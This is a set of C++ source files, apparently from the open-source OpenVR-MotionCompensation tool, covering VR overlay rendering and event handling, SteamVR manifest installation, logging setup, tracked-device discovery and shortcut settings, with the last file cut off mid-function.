SIGNAL(sceneChanged()), this, SLOT(OnRenderRequest())); } m_pPumpEventsTimer.reset(new QTimer()); connect(m_pPumpEventsTimer.get(), SIGNAL(timeout()), this, SLOT(OnTimeoutPumpEvents())); m_pPumpEventsTimer->setInterval(20); m_pPumpEventsTimer->start(); try { m_vrMotionCompensation.connect(); } catch (const std::exception & e) { LOG(ERROR) << "Could not connect to driver component: " << e.what(); } deviceManipulationTabController.initStage2(this, m_pWindow.get()); } void OverlayController::OnRenderRequest() { if (m_pRenderTimer && !m_pRenderTimer->isActive()) { m_pRenderTimer->start(); } } void OverlayController::renderOverlay() { if (!desktopMode) { // skip rendering if the overlay isn't visible if (!vr::VROverlay() || !vr::VROverlay()->IsOverlayVisible(m_ulOverlayHandle) && !vr::VROverlay()->IsOverlayVisible(m_ulOverlayThumbnailHandle)) return; m_pRenderControl->polishItems(); m_pRenderControl->sync(); m_pRenderControl->render(); GLuint unTexture = m_pFbo->texture(); if (unTexture != 0) { #if defined _WIN64 || defined _LP64 // To avoid any compiler warning because of cast to a larger pointer type (warning C4312 on VC) vr::Texture_t texture = { (void*)((uint64_t)unTexture), vr::TextureType_OpenGL, vr::ColorSpace_Auto }; #else vr::Texture_t texture = { (void*)unTexture, vr::TextureType_OpenGL, vr::ColorSpace_Auto }; #endif vr::VROverlay()->SetOverlayTexture(m_ulOverlayHandle, &texture); } m_pOpenGLContext->functions()->glFlush(); // We need to flush otherwise the texture may be empty.*/ } } void OverlayController::OnTimeoutPumpEvents() { if (!vr::VRSystem()) return; vr::VREvent_t vrEvent; while (vr::VROverlay()->PollNextOverlayEvent(m_ulOverlayHandle, &vrEvent, sizeof(vrEvent))) { switch (vrEvent.eventType) { case vr::VREvent_MouseMove: { QPoint ptNewMouse(vrEvent.data.mouse.x, vrEvent.data.mouse.y); if (ptNewMouse != m_ptLastMouse) { QMouseEvent mouseEvent(QEvent::MouseMove, ptNewMouse, m_pWindow->mapToGlobal(ptNewMouse), Qt::NoButton, m_lastMouseButtons, 0); m_ptLastMouse = ptNewMouse; QCoreApplication::sendEvent(m_pWindow.get(), &mouseEvent); OnRenderRequest(); } } break; case vr::VREvent_MouseButtonDown: { QPoint ptNewMouse(vrEvent.data.mouse.x, vrEvent.data.mouse.y); Qt::MouseButton button = vrEvent.data.mouse.button == vr::VRMouseButton_Right ? Qt::RightButton : Qt::LeftButton; m_lastMouseButtons |= button; QMouseEvent mouseEvent(QEvent::MouseButtonPress, ptNewMouse, m_pWindow->mapToGlobal(ptNewMouse), button, m_lastMouseButtons, 0); QCoreApplication::sendEvent(m_pWindow.get(), &mouseEvent); } break; case vr::VREvent_MouseButtonUp: { QPoint ptNewMouse(vrEvent.data.mouse.x, vrEvent.data.mouse.y); Qt::MouseButton button = vrEvent.data.mouse.button == vr::VRMouseButton_Right ? Qt::RightButton : Qt::LeftButton; m_lastMouseButtons &= ~button; QMouseEvent mouseEvent(QEvent::MouseButtonRelease, ptNewMouse, m_pWindow->mapToGlobal(ptNewMouse), button, m_lastMouseButtons, 0); QCoreApplication::sendEvent(m_pWindow.get(), &mouseEvent); } break; case vr::VREvent_ScrollSmooth: { // Wheel speed is defined as 1/8 of a degree QWheelEvent wheelEvent(m_ptLastMouse, m_pWindow->mapToGlobal(m_ptLastMouse), QPoint(), QPoint(vrEvent.data.scroll.xdelta * 360.0f * 8.0f, vrEvent.data.scroll.ydelta * 360.0f * 8.0f), 0, Qt::Vertical, m_lastMouseButtons, 0); QCoreApplication::sendEvent(m_pWindow.get(), &wheelEvent); } break; case vr::VREvent_OverlayShown: { m_pWindow->update(); } break; case vr::VREvent_Quit: { LOG(INFO) << "Received quit request."; vr::VRSystem()->AcknowledgeQuit_Exiting(); // Let us buy some time just in case Shutdown(); QApplication::exit(); return; } break; case vr::VREvent_DashboardActivated: { LOG(DEBUG) << "Dashboard activated"; dashboardVisible = true; } break; case vr::VREvent_DashboardDeactivated: { LOG(DEBUG) << "Dashboard deactivated"; dashboardVisible = false; } break; case vr::VREvent_KeyboardDone: { char keyboardBuffer[1024]; vr::VROverlay()->GetKeyboardText(keyboardBuffer, 1024); emit keyBoardInputSignal(QString(keyboardBuffer), vrEvent.data.keyboard.uUserValue); LOG(TRACE) << "VREvent_KeyboardDone"; } break; default: deviceManipulationTabController.handleEvent(vrEvent); break; } } vr::TrackedDevicePose_t devicePoses[vr::k_unMaxTrackedDeviceCount]; vr::VRSystem()->GetDeviceToAbsoluteTrackingPose(vr::TrackingUniverseStanding, 0.0f, devicePoses, vr::k_unMaxTrackedDeviceCount); deviceManipulationTabController.eventLoopTick(devicePoses); if (m_ulOverlayThumbnailHandle != vr::k_ulOverlayHandleInvalid) { while (vr::VROverlay()->PollNextOverlayEvent(m_ulOverlayThumbnailHandle, &vrEvent, sizeof(vrEvent))) { switch (vrEvent.eventType) { case vr::VREvent_OverlayShown: { m_pWindow->update(); } break; } } } } QString OverlayController::getVersionString() { return QString(applicationVersionString); } QUrl OverlayController::getVRRuntimePathUrl() { return m_runtimePathUrl; } bool OverlayController::soundDisabled() { return noSound; } const vr::VROverlayHandle_t& OverlayController::overlayHandle() { return m_ulOverlayHandle; } const vr::VROverlayHandle_t& OverlayController::overlayThumbnailHandle() { return m_ulOverlayThumbnailHandle; } void OverlayController::showKeyboard(QString existingText, unsigned long userValue) { vr::VROverlay()->ShowKeyboardForOverlay(m_ulOverlayHandle, vr::k_EGamepadTextInputModeNormal, vr::k_EGamepadTextInputLineModeSingleLine, vr::EKeyboardFlags::KeyboardFlag_Modal, "Motion Compensation Overlay", 1024, existingText.toStdString().c_str(), userValue); vr::HmdRect2_t empty = { 0 }; vr::VROverlay()->SetKeyboardPositionForOverlay(m_ulOverlayHandle, empty); LOG(TRACE) << "Showing Keyboard"; } void OverlayController::playActivationSound() { if (!noSound) { activationSoundEffect.play(); } } void OverlayController::playFocusChangedSound() { if (!noSound) { focusChangedSoundEffect.play(); } } } // namespace motioncompensation
17,861
C++
.cpp
421
38.496437
263
0.734051
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,186
main.cpp
openvrmc_OpenVR-MotionCompensation/client_overlay/src/main.cpp
#include "overlaycontroller.h" #include <QApplication> #include <QQmlApplicationEngine> #include <QQuickView> #include <QQmlEngine> #include <QQmlComponent> #include <QSettings> #include <QStandardPaths> #include <openvr.h> #include <iostream> #include "logging.h" const char* logConfigFileName = "logging.conf"; const char* logConfigDefault = "* GLOBAL:\n" " FORMAT = \"[%level] %datetime{%Y-%M-%d %H:%m:%s}: %msg\"\n" " FILENAME = \"OpenVR-MotionCompensationOverlay.log\"\n" " ENABLED = true\n" " TO_FILE = true\n" " TO_STANDARD_OUTPUT = true\n" " MAX_LOG_FILE_SIZE = 2097152 ## 2MB\n" "* TRACE:\n" " ENABLED = false\n" "* DEBUG:\n" " ENABLED = false\n"; INITIALIZE_EASYLOGGINGPP void myQtMessageHandler(QtMsgType type, const QMessageLogContext& context, const QString& msg) { QByteArray localMsg = msg.toLocal8Bit(); switch (type) { case QtDebugMsg: LOG(DEBUG) << localMsg.constData() << " (" << context.file << ":" << context.line << ")"; break; case QtInfoMsg: LOG(INFO) << localMsg.constData() << " (" << context.file << ":" << context.line << ")"; break; case QtWarningMsg: LOG(WARNING) << localMsg.constData() << " (" << context.file << ":" << context.line << ")"; break; case QtCriticalMsg: LOG(ERROR) << localMsg.constData() << " (" << context.file << ":" << context.line << ")"; break; case QtFatalMsg: LOG(FATAL) << localMsg.constData() << " (" << context.file << ":" << context.line << ")"; break; } } void installManifest(bool cleaninstall = false) { auto manifestQPath = QDir::cleanPath(QDir(QCoreApplication::applicationDirPath()).absoluteFilePath("manifest.vrmanifest")); if (QFile::exists(manifestQPath)) { bool alreadyInstalled = false; if (vr::VRApplications()->IsApplicationInstalled(motioncompensation::OverlayController::applicationKey)) { if (cleaninstall) { char buffer[1024]; auto appError = vr::VRApplicationError_None; vr::VRApplications()->GetApplicationPropertyString(motioncompensation::OverlayController::applicationKey, vr::VRApplicationProperty_WorkingDirectory_String, buffer, 1024, &appError); if (appError == vr::VRApplicationError_None) { auto oldManifestQPath = QDir::cleanPath(QDir(buffer).absoluteFilePath("manifest.vrmanifest")); if (oldManifestQPath.compare(manifestQPath, Qt::CaseInsensitive) != 0) { vr::VRApplications()->RemoveApplicationManifest(QDir::toNativeSeparators(oldManifestQPath).toStdString().c_str()); } else { alreadyInstalled = true; } } } else { alreadyInstalled = true; } } auto apperror = vr::VRApplications()->AddApplicationManifest(QDir::toNativeSeparators(manifestQPath).toStdString().c_str()); if (apperror != vr::VRApplicationError_None) { throw std::runtime_error(std::string("Could not add application manifest: ") + std::string(vr::VRApplications()->GetApplicationsErrorNameFromEnum(apperror))); } else if (!alreadyInstalled || cleaninstall) { auto apperror = vr::VRApplications()->SetApplicationAutoLaunch(motioncompensation::OverlayController::applicationKey, true); if (apperror != vr::VRApplicationError_None) { throw std::runtime_error(std::string("Could not set auto start: ") + std::string(vr::VRApplications()->GetApplicationsErrorNameFromEnum(apperror))); } } } else { throw std::runtime_error(std::string("Could not find application manifest: ") + manifestQPath.toStdString()); } } void removeManifest() { auto manifestQPath = QDir::cleanPath(QDir(QCoreApplication::applicationDirPath()).absoluteFilePath("manifest.vrmanifest")); if (QFile::exists(manifestQPath)) { if (vr::VRApplications()->IsApplicationInstalled(motioncompensation::OverlayController::applicationKey)) { vr::VRApplications()->RemoveApplicationManifest(QDir::toNativeSeparators(manifestQPath).toStdString().c_str()); } } else { throw std::runtime_error(std::string("Could not find application manifest: ") + manifestQPath.toStdString()); } } int main(int argc, char* argv[]) { bool desktopMode = false; bool noSound = false; bool noManifest = false; // Parse command line arguments for (int i = 1; i < argc; i++) { if (std::string(argv[i]).compare("-desktop") == 0) { desktopMode = true; } else if (std::string(argv[i]).compare("-nosound") == 0) { noSound = true; } else if (std::string(argv[i]).compare("-nomanifest") == 0) { noManifest = true; } else if (std::string(argv[i]).compare("-installmanifest") == 0) { std::this_thread::sleep_for(std::chrono::seconds(1)); // When we don't wait here we get an ipc error during installation int exitcode = 0; QCoreApplication coreApp(argc, argv); auto initError = vr::VRInitError_None; vr::VR_Init(&initError, vr::VRApplication_Utility); if (initError == vr::VRInitError_None) { try { installManifest(true); } catch (std::exception & e) { exitcode = -1; std::cerr << e.what() << std::endl; } } else { exitcode = -2; std::cerr << std::string("Failed to initialize OpenVR: " + std::string(vr::VR_GetVRInitErrorAsEnglishDescription(initError))) << std::endl; } vr::VR_Shutdown(); exit(exitcode); } else if (std::string(argv[i]).compare("-removemanifest") == 0) { int exitcode = 0; QCoreApplication coreApp(argc, argv); auto initError = vr::VRInitError_None; vr::VR_Init(&initError, vr::VRApplication_Utility); if (initError == vr::VRInitError_None) { try { removeManifest(); } catch (std::exception & e) { exitcode = -1; std::cerr << e.what() << std::endl; } } else { exitcode = -2; std::cerr << std::string("Failed to initialize OpenVR: " + std::string(vr::VR_GetVRInitErrorAsEnglishDescription(initError))) << std::endl; } vr::VR_Shutdown(); exit(exitcode); } else if (std::string(argv[i]).compare("-openvrpath") == 0) { int exitcode = 0; auto initError = vr::VRInitError_None; vr::VR_Init(&initError, vr::VRApplication_Utility); if (initError == vr::VRInitError_None) { static char rchBuffer[1024]; uint32_t unRequiredSize; vr::VR_GetRuntimePath(rchBuffer, sizeof(rchBuffer), &unRequiredSize); std::cout << rchBuffer; } else { exitcode = -2; std::cerr << std::string("Failed to initialize OpenVR: " + std::string(vr::VR_GetVRInitErrorAsEnglishDescription(initError))) << std::endl; } vr::VR_Shutdown(); exit(exitcode); } else if (std::string(argv[i]).compare("-postinstallationstep") == 0) { std::this_thread::sleep_for(std::chrono::seconds(1)); // When we don't wait here we get an ipc error during installation int exitcode = 0; auto initError = vr::VRInitError_None; vr::VR_Init(&initError, vr::VRApplication_Utility); if (initError == vr::VRInitError_None) { vr::VRSettings()->SetBool(vr::k_pch_SteamVR_Section, vr::k_pch_SteamVR_ActivateMultipleDrivers_Bool, true); } else { exitcode = -2; std::cerr << std::string("Failed to initialize OpenVR: " + std::string(vr::VR_GetVRInitErrorAsEnglishDescription(initError))) << std::endl; } vr::VR_Shutdown(); exit(exitcode); } } try { QApplication a(argc, argv); a.setOrganizationName("OVRMC"); a.setApplicationName("OpenVRMotionCompensation"); a.setApplicationDisplayName(motioncompensation::OverlayController::applicationName); a.setApplicationVersion(motioncompensation::OverlayController::applicationVersionString); qInstallMessageHandler(myQtMessageHandler); // Configure logger QString logFilePath; START_EASYLOGGINGPP(argc, argv); el::Loggers::addFlag(el::LoggingFlag::DisableApplicationAbortOnFatalLog); auto logconfigfile = QFileInfo(logConfigFileName).absoluteFilePath(); el::Configurations conf; if (QFile::exists(logconfigfile)) { conf.parseFromFile(logconfigfile.toStdString()); } else { conf.parseFromText(logConfigDefault); } if (!conf.get(el::Level::Global, el::ConfigurationType::Filename)) { logFilePath = QDir(QStandardPaths::writableLocation(QStandardPaths::AppDataLocation)).absoluteFilePath("VRMotionCompensation.log"); conf.set(el::Level::Global, el::ConfigurationType::Filename, QDir::toNativeSeparators(logFilePath).toStdString()); } conf.setRemainingToDefault(); el::Loggers::reconfigureAllLoggers(conf); LOG(INFO) << "|========================================================================================|"; LOG(INFO) << "Application started"; LOG(INFO) << "Log Config: " << QDir::toNativeSeparators(logconfigfile).toStdString(); if (!logFilePath.isEmpty()) { LOG(INFO) << "Log File: " << logFilePath; } if (desktopMode) { LOG(INFO) << "Desktop mode enabled."; } if (noSound) { LOG(INFO) << "Sound effects disabled."; } if (noManifest) { LOG(INFO) << "vrmanifest disabled."; } QSettings appSettings(QSettings::IniFormat, QSettings::UserScope, a.organizationName(), a.applicationName()); motioncompensation::OverlayController::setAppSettings(&appSettings); LOG(INFO) << "Settings File: " << appSettings.fileName().toStdString(); QQmlEngine qmlEngine; motioncompensation::OverlayController* controller = motioncompensation::OverlayController::createInstance(desktopMode, noSound); controller->Init(&qmlEngine); QQmlComponent component(&qmlEngine, QUrl::fromLocalFile(a.applicationDirPath() + "/res/qml/mainwidget.qml")); auto errors = component.errors(); for (auto& e : errors) { LOG(ERROR) << "QML Error: " << e.toString().toStdString() << std::endl; } auto quickObj = component.create(); controller->SetWidget(qobject_cast<QQuickItem*>(quickObj), motioncompensation::OverlayController::applicationName, motioncompensation::OverlayController::applicationKey); if (!desktopMode && !noManifest) { try { installManifest(); } catch (std::exception & e) { LOG(ERROR) << e.what(); } } if (desktopMode) { auto m_pWindow = new QQuickWindow(); qobject_cast<QQuickItem*>(quickObj)->setParentItem(m_pWindow->contentItem()); m_pWindow->setGeometry(0, 0, qobject_cast<QQuickItem*>(quickObj)->width(), qobject_cast<QQuickItem*>(quickObj)->height()); m_pWindow->show(); } return a.exec(); } catch (const std::exception & e) { LOG(FATAL) << e.what(); return -1; } return 0; }
10,363
C++
.cpp
313
29.763578
186
0.695414
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,187
DeviceManipulationTabController.cpp
openvrmc_OpenVR-MotionCompensation/client_overlay/src/tabcontrollers/DeviceManipulationTabController.cpp
#include "DeviceManipulationTabController.h" #include <QQuickWindow> #include <QApplication> #include "../overlaycontroller.h" #include <openvr_math.h> #include <ipc_protocol.h> #include <chrono> #include <QQmlProperty> // application namespace namespace motioncompensation { DeviceManipulationTabController::~DeviceManipulationTabController() { if (identifyThread.joinable()) { identifyThread.join(); } } void DeviceManipulationTabController::initStage1() { InitShortcuts(); reloadMotionCompensationSettings(); } void DeviceManipulationTabController::Beenden() { qApp->quit(); } void DeviceManipulationTabController::initStage2(OverlayController* parent, QQuickWindow* widget) { this->parent = parent; this->widget = widget; // Fill the array with default data for (int i = 0; i < vr::k_unMaxTrackedDeviceCount; ++i) { deviceInfos.push_back(std::make_shared<DeviceInfo>()); } LOG(DEBUG) << "deviceInfos size: " << deviceInfos.size(); SearchDevices(); parent->vrMotionCompensation().setOffsets(_offset); } void DeviceManipulationTabController::eventLoopTick(vr::TrackedDevicePose_t* devicePoses) { if (settingsUpdateCounter >= 50) { settingsUpdateCounter = 0; if (parent->isDashboardVisible() || parent->isDesktopMode()) { unsigned i = 0; for (auto info : deviceInfos) { // Has the device mode changed? bool hasDeviceInfoChanged = updateDeviceInfo(i); // Has the connection status changed? unsigned status = devicePoses[info->openvrId].bDeviceIsConnected ? 0 : 1; if (info->deviceMode == vrmotioncompensation::MotionCompensationDeviceMode::Default && info->deviceStatus != status) { info->deviceStatus = status; hasDeviceInfoChanged = true; } // Push changes to UI if (hasDeviceInfoChanged) { emit deviceInfoChanged(i); } ++i; } SearchDevices(); } } else { settingsUpdateCounter++; } } bool DeviceManipulationTabController::SearchDevices() { bool newDeviceAdded = false; try { // Get some infos about the found devices for (uint32_t id = 0; id < vr::k_unMaxTrackedDeviceCount; ++id) { vr::ETrackedDeviceClass deviceClass = vr::VRSystem()->GetTrackedDeviceClass(id); if (deviceClass != vr::TrackedDeviceClass_Invalid && deviceInfos[id]->deviceClass == vr::TrackedDeviceClass_Invalid) { if (deviceClass == vr::TrackedDeviceClass_HMD || deviceClass == vr::TrackedDeviceClass_Controller || deviceClass == vr::TrackedDeviceClass_GenericTracker) { auto info = std::make_shared<DeviceInfo>(); info->openvrId = id; info->deviceClass = deviceClass; char buffer[vr::k_unMaxPropertyStringSize]; // Get and save the serial number vr::ETrackedPropertyError pError = vr::TrackedProp_Success; vr::VRSystem()->GetStringTrackedDeviceProperty(id, vr::Prop_SerialNumber_String, buffer, vr::k_unMaxPropertyStringSize, &pError); if (pError == vr::TrackedProp_Success) { info->serial = std::string(buffer); } else { info->serial = std::string("<unknown serial>"); LOG(ERROR) << "Could not get serial of device " << id; } // Get and save the current device mode try { vrmotioncompensation::DeviceInfo info2; parent->vrMotionCompensation().getDeviceInfo(info->openvrId, info2); info->deviceMode = info2.deviceMode; } catch (std::exception& e) { LOG(ERROR) << "Exception caught while getting device info: " << e.what(); } // Store the found info deviceInfos[id] = info; LOG(INFO) << "Found device: id " << info->openvrId << ", class " << info->deviceClass << ", serial " << info->serial; newDeviceAdded = true; } } } if (newDeviceAdded) { // Remove all map entries TrackerArrayIdToDeviceId.clear(); HMDArrayIdToDeviceId.clear(); // Create new maps emit deviceCountChanged(); } } catch (const std::exception& e) { LOG(ERROR) << "Could not get device infos: " << e.what(); } return newDeviceAdded; } void DeviceManipulationTabController::handleEvent(const vr::VREvent_t&) { } void DeviceManipulationTabController::reloadMotionCompensationSettings() { QSettings* settings = OverlayController::appSettings(); settings->beginGroup("deviceManipulationSettings"); // Load serials _HMDSerial = settings->value("motionCompensationHMDSerial", "").toString(); _RefTrackerSerial = settings->value("motionCompensationRefTrackerSerial", "").toString(); // Load filter settings _LPFBeta = settings->value("motionCompensationLPFBeta", 0.85).toDouble(); _samples = settings->value("motionCompensationSamples", 12).toUInt(); // Load offset settings _offset.Translation.v[0] = settings->value("motionCompensationOffsetTranslation_X", 0.0).toDouble(); _offset.Translation.v[1] = settings->value("motionCompensationOffsetTranslation_Y", 0.0).toDouble(); _offset.Translation.v[2] = settings->value("motionCompensationOffsetTranslation_Z", 0.0).toDouble(); _offset.Rotation.v[0] = settings->value("motionCompensationOffsetRotation_P", 0.0).toDouble(); _offset.Rotation.v[1] = settings->value("motionCompensationOffsetRotation_Y", 0.0).toDouble(); _offset.Rotation.v[2] = settings->value("motionCompensationOffsetRotation_R", 0.0).toDouble(); settings->endGroup(); // Load shortcuts settings->beginGroup("motionCompensationShortcuts"); Qt::Key shortcutKey = (Qt::Key)settings->value("shortcut_0_key", Qt::Key::Key_unknown).toInt(); Qt::KeyboardModifiers shortcutMod = settings->value("shortcut_0_mod", Qt::KeyboardModifier::NoModifier).toInt(); newKey(0, shortcutKey, shortcutMod); shortcutKey = (Qt::Key)settings->value("shortcut_1_key", Qt::Key::Key_unknown).toInt(); Qt::KeyboardModifiers shortcutMod_2 = settings->value("shortcut_1_mod", Qt::KeyboardModifier::NoModifier).toInt(); newKey(1, shortcutKey, shortcutMod_2); settings->endGroup(); LOG(INFO) << "Loading saved Settings"; } void DeviceManipulationTabController::saveMotionCompensationSettings() { LOG(INFO) << "Saving Settings"; QSettings* settings = OverlayController::appSettings(); settings->beginGroup("deviceManipulationSettings"); // Save serials settings->setValue("motionCompensationHMDSerial", _HMDSerial); settings->setValue("motionCompensationRefTrackerSerial", _RefTrackerSerial); // Save filter settings settings->setValue("motionCompensationLPFBeta", _LPFBeta); settings->setValue("motionCompensationSamples", _samples); // Save offset settings settings->setValue("motionCompensationOffsetTranslation_X", _offset.Translation.v[0]); settings->setValue("motionCompensationOffsetTranslation_Y", _offset.Translation.v[1]); settings->setValue("motionCompensationOffsetTranslation_Z", _offset.Translation.v[2]); settings->setValue("motionCompensationOffsetRotation_P", _offset.Rotation.v[0]); settings->setValue("motionCompensationOffsetRotation_Y", _offset.Rotation.v[1]); settings->setValue("motionCompensationOffsetRotation_R", _offset.Rotation.v[2]); settings->endGroup(); settings->sync(); saveMotionCompensationShortcuts(); } void DeviceManipulationTabController::saveMotionCompensationShortcuts() { QSettings* settings = OverlayController::appSettings(); settings->beginGroup("motionCompensationShortcuts"); // Save shortcuts settings->setValue("shortcut_0_key", getKey_AsKey(0)); settings->setValue("shortcut_0_mod", (int)getModifiers_AsModifiers(0)); settings->setValue("shortcut_1_key", getKey_AsKey(1)); settings->setValue("shortcut_1_mod", (int)getModifiers_AsModifiers(1)); settings->endGroup(); settings->sync(); } void DeviceManipulationTabController::InitShortcuts() { NewShortcut(0, &DeviceManipulationTabController::toggleMotionCompensationMode, "Enable / Disable Motion Compensation"); NewShortcut(1, &DeviceManipulationTabController::resetRefZeroPose, "Reset reference zero pose"); } void DeviceManipulationTabController::NewShortcut(int id, void (DeviceManipulationTabController::* method)(), QString description) { shortcut[id].shortcut = new QGlobalShortcut(this); shortcut[id].description = description; shortcut[id].method = method; if (shortcut[id].isConnected) { disconnect(shortcut[id].connectionHandler); } ConnectShortcut(id); } void DeviceManipulationTabController::ConnectShortcut(int id) { shortcut[id].connectionHandler = connect(shortcut[id].shortcut, &QGlobalShortcut::activated, this, shortcut[id].method); shortcut[id].isConnected = true; } void DeviceManipulationTabController::DisconnectShortcut(int id) { disconnect(shortcut[id].connectionHandler); shortcut[id].isConnected = false; } void DeviceManipulationTabController::newKey(int id, Qt::Key key, Qt::KeyboardModifiers modifier) { if (key != Qt::Key::Key_unknown) { shortcut[id].key = key; shortcut[id].modifiers = modifier; shortcut[id].shortcut->setShortcut(QKeySequence(key + modifier)); saveMotionCompensationShortcuts(); } } void DeviceManipulationTabController::removeKey(int id) { shortcut[id].shortcut->unsetShortcut(); shortcut[id].key = Qt::Key::Key_unknown; shortcut[id].modifiers = Qt::KeyboardModifier::NoModifier; } QString DeviceManipulationTabController::getStringFromKey(Qt::Key key) { return QKeySequence(key).toString(); } QString DeviceManipulationTabController::getStringFromModifiers(Qt::KeyboardModifiers key) { return QKeySequence(key).toString(); } Qt::Key DeviceManipulationTabController::getKey_AsKey(int id) { return shortcut[id].key; } QString DeviceManipulationTabController::getKey_AsString(int id) { if (shortcut[id].shortcut->isEmpty()) { return "Empty"; } return QKeySequence(shortcut[id].key).toString(); } Qt::KeyboardModifiers DeviceManipulationTabController::getModifiers_AsModifiers(int id) { return shortcut[id].modifiers; } QString DeviceManipulationTabController::getModifiers_AsString(int id) { return QKeySequence(shortcut[id].modifiers).toString(); } QString DeviceManipulationTabController::getKeyDescription(int id) { return shortcut[id].description; } unsigned DeviceManipulationTabController::getDeviceCount() { return (unsigned)deviceInfos.size(); } QString DeviceManipulationTabController::getDeviceSerial(unsigned index) { if (index < deviceInfos.size()) { return QString::fromStdString(deviceInfos[index]->serial); } else { return QString("<ERROR>"); } } unsigned DeviceManipulationTabController::getOpenVRId(unsigned index) { if (index < deviceInfos.size()) { return (int)deviceInfos[index]->openvrId; } else { return vr::k_unTrackedDeviceIndexInvalid; } } int DeviceManipulationTabController::getDeviceClass(unsigned index) { if (index < deviceInfos.size()) { return (int)deviceInfos[index]->deviceClass; } else { return -1; } } int DeviceManipulationTabController::getDeviceState(unsigned index) { if (index < deviceInfos.size()) { return (int)deviceInfos[index]->deviceStatus; } else { return -1; } } int DeviceManipulationTabController::getDeviceMode(unsigned index) { if (index < deviceInfos.size()) { return (int)deviceInfos[index]->deviceMode; } else { return -1; } } void DeviceManipulationTabController::setTrackerArrayID(unsigned OpenVRId, unsigned ArrayID) { TrackerArrayIdToDeviceId.insert(std::make_pair(ArrayID, OpenVRId)); LOG(DEBUG) << "Set Tracker Array ID, OpenVR ID: " << OpenVRId << ", Array ID: " << ArrayID; } int DeviceManipulationTabController::getTrackerDeviceID(unsigned ArrayID) { //Search for the device ID auto search = TrackerArrayIdToDeviceId.find(ArrayID); if (search != TrackerArrayIdToDeviceId.end()) { return search->second; } return -1; } void DeviceManipulationTabController::setReferenceTracker(unsigned openVRId) { _RefTrackerSerial = QString::fromStdString(deviceInfos[openVRId]->serial); } void DeviceManipulationTabController::setHMDArrayID(unsigned OpenVRId, unsigned ArrayID) { HMDArrayIdToDeviceId.insert(std::make_pair(ArrayID, OpenVRId)); LOG(DEBUG) << "Set HMD Array ID, OpenVR ID: " << OpenVRId << ", Array ID: " << ArrayID; } int DeviceManipulationTabController::getHMDDeviceID(unsigned ArrayID) { //Search for the device ID auto search = HMDArrayIdToDeviceId.find(ArrayID); if (search != HMDArrayIdToDeviceId.end()) { return search->second; } return -1; } void DeviceManipulationTabController::setHMD(unsigned openVRId) { _HMDSerial = QString::fromStdString(deviceInfos[openVRId]->serial); } bool DeviceManipulationTabController::updateDeviceInfo(unsigned OpenVRId) { bool retval = false; if (OpenVRId < deviceInfos.size()) { try { vrmotioncompensation::DeviceInfo info; parent->vrMotionCompensation().getDeviceInfo(deviceInfos[OpenVRId]->openvrId, info); if (deviceInfos[OpenVRId]->deviceMode != info.deviceMode) { deviceInfos[OpenVRId]->deviceMode = info.deviceMode; retval = true; } } catch (std::exception& e) { LOG(ERROR) << "Exception caught while getting device info: " << e.what(); } } return retval; } void DeviceManipulationTabController::toggleMotionCompensationMode() { int MCid = -1; int RTid = -1; LOG(DEBUG) << "ToggleMC: HMD Serial: " << _HMDSerial.toStdString(); LOG(DEBUG) << "ToggleMC: Ref Tracker Serial: " << _RefTrackerSerial.toStdString(); // If the dashboard is not open, we need to refresh the device list // New connected devices are otherwise not displayed if (!parent->isDashboardVisible() || !parent->isDesktopMode()) { SearchDevices(); } // Search for the correct serial number and save its OpenVR Id. if (_RefTrackerSerial != "" && _HMDSerial != "") { for (int i = 0; i < vr::k_unMaxTrackedDeviceCount; i++) { if (deviceInfos[i]->serial.compare(_HMDSerial.toStdString()) == 0) { MCid = i; } if (deviceInfos[i]->serial.compare(_RefTrackerSerial.toStdString()) == 0) { RTid = i; } } } if (MCid >= 0 && RTid >= 0 && MCid != RTid) { LOG(DEBUG) << "ToggleMC: Found both devices. HMD OVRID: " << MCid << ". Ref Tracker OVRID: " << RTid; applySettings_ovrid(MCid, RTid, !_MotionCompensationIsOn); } //int MCindex = QQmlProperty::read(parent, "hmdSelectionComboBox.currentIndex").toInt(); } // Enables or disables the motion compensation for the selected device bool DeviceManipulationTabController::applySettings(unsigned MCindex, unsigned RTindex, bool EnableMotionCompensation) { unsigned RTid = 0; unsigned MCid = 0; // A few checks if the user input is valid if (MCindex < 0) { m_deviceModeErrorString = "Please select a device"; return false; } auto search = HMDArrayIdToDeviceId.find(MCindex); if (search != HMDArrayIdToDeviceId.end()) { MCid = search->second; } else { m_deviceModeErrorString = "Invalid internal reference for MC"; return false; } LOG(DEBUG) << "Got this OpenVR ID for HMD: " << MCid; // Input validation for tracker if (_motionCompensationMode == vrmotioncompensation::MotionCompensationMode::ReferenceTracker) { if (RTindex < 0) { m_deviceModeErrorString = "Please select a reference tracker"; return false; } // Search for the device ID search = TrackerArrayIdToDeviceId.find(RTindex); if (search != TrackerArrayIdToDeviceId.end()) { RTid = search->second; } else { m_deviceModeErrorString = "Invalid internal reference for RT"; return false; } LOG(DEBUG) << "Got this OpenVR ID for Tracker: " << RTid; if (MCid == RTid) { m_deviceModeErrorString = "\"Device\" and \"Reference Tracker\" cannot be the same!"; return false; } if (deviceInfos[RTid]->deviceClass == vr::ETrackedDeviceClass::TrackedDeviceClass_HMD) { m_deviceModeErrorString = "\"Reference Tracker\" cannot be a HMD!"; return false; } if (deviceInfos[RTid]->deviceClass == vr::ETrackedDeviceClass::TrackedDeviceClass_Invalid) { m_deviceModeErrorString = "\"Reference Tracker\" is invalid!"; return false; } } if (deviceInfos[MCid]->deviceClass != vr::ETrackedDeviceClass::TrackedDeviceClass_HMD) { m_deviceModeErrorString = "\"Device\" is not a HMD!"; return false; } return applySettings_ovrid(MCid, RTid, EnableMotionCompensation); } bool DeviceManipulationTabController::applySettings_ovrid(unsigned MCid, unsigned RTid, bool EnableMotionCompensation) { try { vrmotioncompensation::MotionCompensationMode NewMode = vrmotioncompensation::MotionCompensationMode::ReferenceTracker; // Send new settings to the driver.dll if (EnableMotionCompensation && _motionCompensationMode == vrmotioncompensation::MotionCompensationMode::ReferenceTracker) { LOG(INFO) << "Sending Motion Compensation Mode: ReferenceTracker"; } else { LOG(INFO) << "Sending Motion Compensation Mode: Disabled"; NewMode = vrmotioncompensation::MotionCompensationMode::Disabled; } // Send new mode parent->vrMotionCompensation().setDeviceMotionCompensationMode(deviceInfos[MCid]->openvrId, deviceInfos[RTid]->openvrId, NewMode); // Send settings parent->vrMotionCompensation().setMoticonCompensationSettings(_LPFBeta, _samples, _setZeroMode); } catch 